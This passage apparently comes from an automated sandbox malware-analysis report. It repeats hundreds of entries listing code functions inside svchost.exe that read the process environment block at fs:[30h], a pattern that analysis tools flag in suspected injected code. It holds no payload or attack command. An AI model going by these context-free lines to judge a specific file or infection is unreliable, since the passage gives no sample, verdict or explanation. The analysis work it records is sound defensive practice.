                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
